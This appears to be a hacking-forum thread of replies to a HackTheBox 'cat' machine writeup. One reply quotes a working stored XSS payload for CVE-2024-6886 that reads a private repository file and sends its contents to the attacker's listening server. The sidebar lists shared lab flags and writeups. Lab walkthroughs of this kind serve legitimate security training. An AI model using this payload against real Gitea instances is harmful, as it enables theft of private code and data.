|
cat Linux Medium writeup
by RedBlock - Sunday February 2, 2025 at 07:17 PM
|
|
Feb 08, 2025, 03:13 AM
This is the tutorial I needed, even though I'm just starting to do it now
a good machine, just based on basic flaws, it can do a lesson of average difficulty
Feb 08, 2025, 12:17 PM
wow thank you so much for the write-up, I’m stuck at the root of the privilege escalation and have no idea what to do next
Feb 08, 2025, 08:24 PM
So what are the conditions for 'Jobert' to click the link? I tested this various ways and couldn't understand why sometimes I would get a response to my python server and other times I would get nothing even after inserting the exact XSS payload in the description. Is it the machines cron job schedule of sendmail? It doesn't appear to be executing immediately? Or am I missing something?
Feb 08, 2025, 08:57 PM
(This post was last modified: Feb 08, 2025, 08:58 PM by bobthebuilder1111.)
I can't say for certain, but I had a lot more luck spamming jobert from the victim box vs. my Kali box. (Like I got ONE *bad* hit from my kali box, but repeated success from victim).
Feb 08, 2025, 09:04 PM
(Feb 08, 2025, 08:57 PM)bobthebuilder1111 Wrote: I can't say for certain, but I had a lot more luck spamming jobert from the victim box vs. my Kali box. (Like I got ONE *bad* hit from my kali box, but repeated success from victim). So I reset the box and the XSS payload that worked this time was this one. (in the description box per CVE-2024-6886) <a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response=>response.text()).then(data=>fetch('http://10.10.16.2:8888/?response='+encodeURIComponent(data))).catch(error=>console.error('Error:', error));">lol</a> I didn't have to create an empty file as a previous post recommended. This payload in the repo description box is enough to get a call back to your listening server. I think the box may be unstable and may need a reset if the jobert user is not 'clicking' on the link. But you're right. I think you have to spam jobert. Sent it 16 times after resetting the box and indeed got back 16 responses. |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 602 | 91,758 |
5 hours ago Last Post: sabero_exe |
||
| [FREE] CPTS 12 FLAGS | 68 | 1,959 |
Yesterday, 09:54 AM Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 92,893 |
Yesterday, 08:48 AM Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,621 |
Yesterday, 05:08 AM Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,271 |
Apr 30, 2026, 02:10 PM Last Post: kkkato |
||

a good machine, just based on basic flaws, it can do a lesson of average difficulty